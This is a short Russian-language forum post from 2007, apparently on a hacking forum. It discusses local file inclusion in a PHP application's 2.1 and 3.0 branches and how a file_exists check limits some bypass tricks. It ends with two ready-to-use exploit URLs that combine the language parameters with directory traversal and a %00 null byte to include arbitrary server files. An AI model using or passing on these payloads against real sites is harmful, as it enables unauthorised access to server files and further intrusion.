12.04.2007, 15:34
|
|
Banned
Регистрация: 05.12.2005
Сообщений: 982
Провел на форуме:
4839935
Репутация:
1202
|
|
Кажется ясно...
file_exists обламывает не только:
- удаленный инклуд
- экранирование знаком вопроса для обхода расширения
... но и выход из директории через существующий файл =(
однако, там есть код и без file_exists
тоесть, для 2.1 ветки
./index.php?newlang=asd&language=russian.php/../../robots.txt%00
для 3.0 ветки
./index.php?newlang=asd&conf[language]=russian.php/../../robots.txt%00
Последний раз редактировалось Elekt; 12.04.2007 в 15:37..
|
|
|